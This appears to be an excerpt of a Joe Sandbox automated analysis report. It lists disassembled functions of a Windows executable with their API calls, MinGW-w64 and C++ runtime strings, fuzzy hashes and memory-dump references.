Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Thread$Event$Context$AllocHandleInformationObjectResumeSingleSuspendValueWait
String ID:
API String ID: 1746956495-0
Opcode ID: f789b482d1c0f3fa81d7b2275365b135f1cf28eaaa5179bc3e2678044981c34d
Instruction ID: fa2853715889f94cb49a83fbbb2827f4dd3f4e766864c19957452a0357a57c9d
Opcode Fuzzy Hash: f789b482d1c0f3fa81d7b2275365b135f1cf28eaaa5179bc3e2678044981c34d
Instruction Fuzzy Hash: 5381C422A59BC285FB64BF2594052F8A760EF41BA4F9C0631DE5E4F2D5DF2CF491A320

Function 00007FF75F8E8680 Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 314stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8E86C3
strlen.MSVCRT ref: 00007FF75F8E8763

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F8E8706, 00007FF75F8E87A6, 00007FF75F8E8846
basic_string: construction from null is not valid, xrefs: 00007FF75F8E8937, 00007FF75F8E898E, 00007FF75F8E89DE

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: e29973676b6cf1c87aca60eb4c4d32026e4c7be800cea9dd31b42a99b41e958e
Instruction ID: a5f84be064410447bf798b155b70b593b1e3c57ed1fc49e1bf75209fcc72bfb4
Opcode Fuzzy Hash: e29973676b6cf1c87aca60eb4c4d32026e4c7be800cea9dd31b42a99b41e958e
Instruction Fuzzy Hash: 8CA17062B19B9585EE21BF1AE4401EDA360FB44BD4BCC0436EE4D4B7A5DF2CE561D320

Function 00007FF75F8C0060 Relevance: 13.7, APIs: 9, Instructions: 153COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF75F8C008E

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 324b89b5f6c0daf2970604fa24a0e56d0a5e36b88e33d75ee2ea539d8031e9dd
Instruction ID: c25d713c45738ea41a3708eb81ec320e355129ba0af841fdaa8fc35f6479e72d
Opcode Fuzzy Hash: 324b89b5f6c0daf2970604fa24a0e56d0a5e36b88e33d75ee2ea539d8031e9dd
Instruction Fuzzy Hash: C0519122A1AB8694EA55BF11E4501F8A364AF44B80FDC8435DA0E8F395DF3CF561E720

Function 00007FF75F8CB910 Relevance: 13.6, APIs: 9, Instructions: 121COMMON

Download Yara Rule

APIs

TryEnterCriticalSection.KERNEL32 ref: 00007FF75F8CB987
CloseHandle.KERNEL32 ref: 00007FF75F8CB9C9
CloseHandle.KERNEL32 ref: 00007FF75F8CB9D2
LeaveCriticalSection.KERNEL32 ref: 00007FF75F8CB9D7
DeleteCriticalSection.KERNEL32 ref: 00007FF75F8CB9E7
DeleteCriticalSection.KERNEL32 ref: 00007FF75F8CB9EC
DeleteCriticalSection.KERNEL32 ref: 00007FF75F8CB9F2
free.MSVCRT ref: 00007FF75F8CB9F7

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CriticalSection$Delete$CloseHandle$EnterLeavefree
String ID:
API String ID: 549544486-0
Opcode ID: 74bb9b4665fa0efd3c2310787a5fe467dd126bfdaf21c6c3fd9884b241be65bb
Instruction ID: dcf26e3b24785e4edf573a678d0ca0f980749ab0c8c98033637302621bf071ef
Opcode Fuzzy Hash: 74bb9b4665fa0efd3c2310787a5fe467dd126bfdaf21c6c3fd9884b241be65bb
Instruction Fuzzy Hash: 4441B323B05A8645F651AF25AC007E96355AB81BB8FCC0232DD6D8F3D5DE3CE496E320

Function 00007FF75F8CB490 Relevance: 13.6, APIs: 9, Instructions: 81COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007FF75F8CB4BB
CreateSemaphoreA.KERNEL32 ref: 00007FF75F8CB4EE
CreateSemaphoreA.KERNEL32 ref: 00007FF75F8CB504
InitializeCriticalSection.KERNEL32(?,00007FF75F9D0190,00007FF75F8D02E8,?,?,00007FF75F99BAA0,00000000,00007FF75F8D0375,00007FF75F99BAA0,?,00007FF75F99BAA0,00007FF75F8D0909,00007FF75F99C480,?,00007FF75F99BAA0), ref: 00007FF75F8CB52C
InitializeCriticalSection.KERNEL32(?,00007FF75F9D0190,00007FF75F8D02E8,?,?,00007FF75F99BAA0,00000000,00007FF75F8D0375,00007FF75F99BAA0,?,00007FF75F99BAA0,00007FF75F8D0909,00007FF75F99C480,?,00007FF75F99BAA0), ref: 00007FF75F8CB532
InitializeCriticalSection.KERNEL32(?,00007FF75F9D0190,00007FF75F8D02E8,?,?,00007FF75F99BAA0,00000000,00007FF75F8D0375,00007FF75F99BAA0,?,00007FF75F99BAA0,00007FF75F8D0909,00007FF75F99C480,?,00007FF75F99BAA0), ref: 00007FF75F8CB538

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID:
API String ID: 2075313795-0
Opcode ID: aa24754e511399bdb0deec9d2dfa1d101c30fd519aa424a8312c3826416e3dfa
Instruction ID: 48819eb580d81b03a433cc5c722b6442731a4d9bfa90e4177f2ef50bcbee979d
Opcode Fuzzy Hash: aa24754e511399bdb0deec9d2dfa1d101c30fd519aa424a8312c3826416e3dfa
Instruction Fuzzy Hash: 2821BF32B0AB8285FB59AF65E9503B96290AF44B94F8C8235CE1D4F3C5EE3CA4909310

Function 00007FF75F8BEB00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF75F8BEC1B

Strings

VirtualProtect failed with code 0x%x, xrefs: 00007FF75F8BEC8E
Mingw-w64 runtime failure:, xrefs: 00007FF75F8BEB37
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF75F8BECB1
Address %p has no image-section, xrefs: 00007FF75F8BEB72, 00007FF75F8BECC5

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: add52bd74ac2730681b4b08c881067a4124d7d63331f58e463502291fba1dee3
Instruction ID: 64dd29fb81cd1026877e729403f92a72dd987f74e8c7dbbc565048b9d4a1e2d8
Opcode Fuzzy Hash: add52bd74ac2730681b4b08c881067a4124d7d63331f58e463502291fba1dee3
Instruction Fuzzy Hash: 6E51EE32A08A8696EB10AB11E8446E9F760FF84B94FCC4131DE4D5B3A8DF3CE855C760

Function 00007FF75F8D3A2A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68fileCOMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF75F8D3977
fwrite.MSVCRT ref: 00007FF75F8D399C
fwrite.MSVCRT ref: 00007FF75F8D39E6
fputs.MSVCRT ref: 00007FF75F8D39F8
fputc.MSVCRT ref: 00007FF75F8D3A0C

Part of subcall function 00007FF75F8BFCF0: RtlCaptureContext.KERNEL32 ref: 00007FF75F8BFD82
Part of subcall function 00007FF75F8BFCF0: RtlUnwindEx.KERNEL32 ref: 00007FF75F8BFDBF
Part of subcall function 00007FF75F8BFCF0: abort.MSVCRT ref: 00007FF75F8BFDC5

Strings

what(): , xrefs: 00007FF75F8D39DF
terminate called recursively, xrefs: 00007FF75F8D3992

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: abortfwrite$CaptureContextUnwindfputcfputs
String ID: what(): $terminate called recursively
API String ID: 918577357-2063472960
Opcode ID: 291977919ab7fa4619b7a392b11313dedeca35bfe836718b29f583f332bbcd0e
Instruction ID: fbd87bb705f8bc83944b0f32566eadc72bcca05bc761bd679064e97554f1deb1
Opcode Fuzzy Hash: 291977919ab7fa4619b7a392b11313dedeca35bfe836718b29f583f332bbcd0e
Instruction Fuzzy Hash: 1621C321B29A8641EA54BB66E4293FDD2159F85B80F8C003AEA0E8F3D6DF2DF4105371

Function 00007FF75F8D6CD0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8D6CFA
memcmp.MSVCRT ref: 00007FF75F8D6D18
memcmp.MSVCRT ref: 00007FF75F8D6DB6

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F8D6D64, 00007FF75F8D6DFC, 00007FF75F8D6E8C, 00007FF75F8D6F3C, 00007FF75F8D6F55
basic_string::compare, xrefs: 00007FF75F8D6D5D, 00007FF75F8D6DF5, 00007FF75F8D6E85, 00007FF75F8D6F35, 00007FF75F8D6F4E

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 6bb02f1659573f7173421bc7d96d3ec77bc8d579c386a245098c9043eb179c90
Instruction ID: 0504b3b8d4de7954e324c646b128aa922e9674182c187e5051578a8b760e427c
Opcode Fuzzy Hash: 6bb02f1659573f7173421bc7d96d3ec77bc8d579c386a245098c9043eb179c90
Instruction Fuzzy Hash: D051E7A2F18ACA41EE14BA66ED002F492545F05BE0FDC4632DE2CDB7D5DE1CF995A320

Function 00007FF75F8E64D0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8E64F9
memcmp.MSVCRT ref: 00007FF75F8E651A
memcmp.MSVCRT ref: 00007FF75F8E65B6

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F8E6564, 00007FF75F8E65FC, 00007FF75F8E668C, 00007FF75F8E673C, 00007FF75F8E6755
basic_string::compare, xrefs: 00007FF75F8E655D, 00007FF75F8E65F5, 00007FF75F8E6685, 00007FF75F8E6735, 00007FF75F8E674E

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 68ae6bae33f02e1bad149284b6bd7b7dd2a08e47bccab84a5df323f442285b76
Instruction ID: 12eb5964f238291d975ea99f2e410fa8aee3e587f3942d33a85742d1357a1335
Opcode Fuzzy Hash: 68ae6bae33f02e1bad149284b6bd7b7dd2a08e47bccab84a5df323f442285b76
Instruction Fuzzy Hash: 6B51F692F29AC641EE04AA26ED103E4D2549F05BE4FDC4235EE2C9B7E9DE1CF9919310

Function 00007FF75F8CC7D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF75F8CC810

Strings

basic_string::_M_create, xrefs: 00007FF75F8CC7D2

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CurrentThread
String ID: basic_string::_M_create
API String ID: 2882836952-3122258987
Opcode ID: 53454710a0597d07d8426650471ad8e7b7df0d87e386177c2ea885cc157312a7
Instruction ID: fd8f4cdd130b7ddaed68ba8c38797e76df4e2cbf1c31d0b0b0f6073e4304e02b
Opcode Fuzzy Hash: 53454710a0597d07d8426650471ad8e7b7df0d87e386177c2ea885cc157312a7
Instruction Fuzzy Hash: 4D314532F097C246FB557E2999447BAA2D1DF45B54F9C8035CA0D8E284EF2CF891A270

Function 00007FF75F8CE3E0 Relevance: 10.6, APIs: 7, Instructions: 81COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF75F8CE3F5

Part of subcall function 00007FF75F8CD570: TlsAlloc.KERNEL32 ref: 00007FF75F8CD5AD

TlsGetValue.KERNEL32 ref: 00007FF75F8CE408
realloc.MSVCRT ref: 00007FF75F8CE441
realloc.MSVCRT ref: 00007FF75F8CE459
memset.MSVCRT ref: 00007FF75F8CE47C
memset.MSVCRT ref: 00007FF75F8CE492
SetLastError.KERNEL32 ref: 00007FF75F8CE4B9

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: ErrorLastmemsetrealloc$AllocValue
String ID:
API String ID: 2127548929-0
Opcode ID: 3ff0690f7f5a9f15f60a8ada848e35d2ef969419ccee2db4f91c80eef75124c6
Instruction ID: d9c2d17526aeb3c464190463de67dc9ed8d4ad068ea3cb24ee6549aa15bf5b46
Opcode Fuzzy Hash: 3ff0690f7f5a9f15f60a8ada848e35d2ef969419ccee2db4f91c80eef75124c6
Instruction Fuzzy Hash: 27219162B15B8291EB15FF29A8045EDA392EF45B94F880435DD0D4F395EE3CF891D360

Function 00007FF75F8C06E0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF75F8C06E9
_errno.MSVCRT ref: 00007FF75F8C07D0

Part of subcall function 00007FF75F8C0AA0: _wfindfirst64.MSVCRT ref: 00007FF75F8C0AB2

wcslen.MSVCRT ref: 00007FF75F8C073E
wcscpy.MSVCRT ref: 00007FF75F8C0754

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: _errno$_wfindfirst64wcscpywcslen
String ID:
API String ID: 2144498627-0
Opcode ID: 5666a025c08d4113b6347b14c0f83c1c8b661bd71551048367378fc50bf3fed1
Instruction ID: 7678739f090ba28240290c73b6a8db1d47afa8ad8a6f4271a9c145ce4326f3c9
Opcode Fuzzy Hash: 5666a025c08d4113b6347b14c0f83c1c8b661bd71551048367378fc50bf3fed1
Instruction Fuzzy Hash: 77212FA1A1878285E754BF2584543EDA290AB40BA8FDC4630CB2D8F2C5DF39B461AB75

Function 00007FF75F8D0050 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 52COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75F8D00C4
exit.MSVCRT ref: 00007FF75F8D00CE

Strings

Assertion failed: (%s), file %s, line %d, xrefs: 00007FF75F8D00BD
(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00007FF75F8D00B3
../mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 00007FF75F8D00AC
(, xrefs: 00007FF75F8D00A4

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: exitfprintf
String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
API String ID: 4243785698-2396019738
Opcode ID: 6d3363b26023840044199938a3c904b5ad4289ca5541accfe0a28fec2290ac3f
Instruction ID: 99a63f19e82f1a86b0264f0c3966d96446c0f6a0a96f3997f25a1e4b360c883d
Opcode Fuzzy Hash: 6d3363b26023840044199938a3c904b5ad4289ca5541accfe0a28fec2290ac3f
Instruction Fuzzy Hash: 04119362B1868586EB10FF69E4152F8B7A0EB44B44FC88131DA0D8B3A5DF2CE856D760

Function 00007FF75F8CB290 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF75F8CB2B0
fprintf.MSVCRT ref: 00007FF75F8CB2CF
GetCurrentThreadId.KERNEL32 ref: 00007FF75F8CB2E5
fprintf.MSVCRT ref: 00007FF75F8CB30C

Strings

C%p %lu V=%0X w=%ld %s, xrefs: 00007FF75F8CB2F3
C%p %lu %s, xrefs: 00007FF75F8CB2BE

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID: C%p %lu %s$C%p %lu V=%0X w=%ld %s
API String ID: 1384477639-1941858864
Opcode ID: 963595f198e62fdb3cc8c45ebfb27ba854b0b5b6c59052da72f5d0a94fe817a6
Instruction ID: 596ba539aa345031aba36fba714ab6b664f7a3a74ef91278a9f5dfc0b5095fa4
Opcode Fuzzy Hash: 963595f198e62fdb3cc8c45ebfb27ba854b0b5b6c59052da72f5d0a94fe817a6
Instruction Fuzzy Hash: 5101A176A09F8186EB10AF65F8000E8B7A4BB88B94F9C8032DD4C87328DF3CE495C710

Function 00007FF75F8CFE90 Relevance: 10.5, APIs: 7, Instructions: 44COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF75F8CFEB8
OpenProcess.KERNEL32 ref: 00007FF75F8CFECF
CloseHandle.KERNEL32 ref: 00007FF75F8CFEDD
_errno.MSVCRT ref: 00007FF75F8CFEF8

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen_errno
String ID:
API String ID: 2250453136-0
Opcode ID: cab79bda074d4f9d60d1800ab902ce9462c53bc4857ebd5c76cb2749fcc68820
Instruction ID: bfda030c19611cc0995d32c207c3d911a44eb748680ff42a7001b9af6f0a3472
Opcode Fuzzy Hash: cab79bda074d4f9d60d1800ab902ce9462c53bc4857ebd5c76cb2749fcc68820
Instruction Fuzzy Hash: C0015661B09BC382F7953F5068442F892509F84715FED4535DA1D8E3D2CF2D38D5A230

Function 00007FF75F8CD8B0 Relevance: 9.1, APIs: 6, Instructions: 97sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF75F8CD570: TlsAlloc.KERNEL32 ref: 00007FF75F8CD5AD

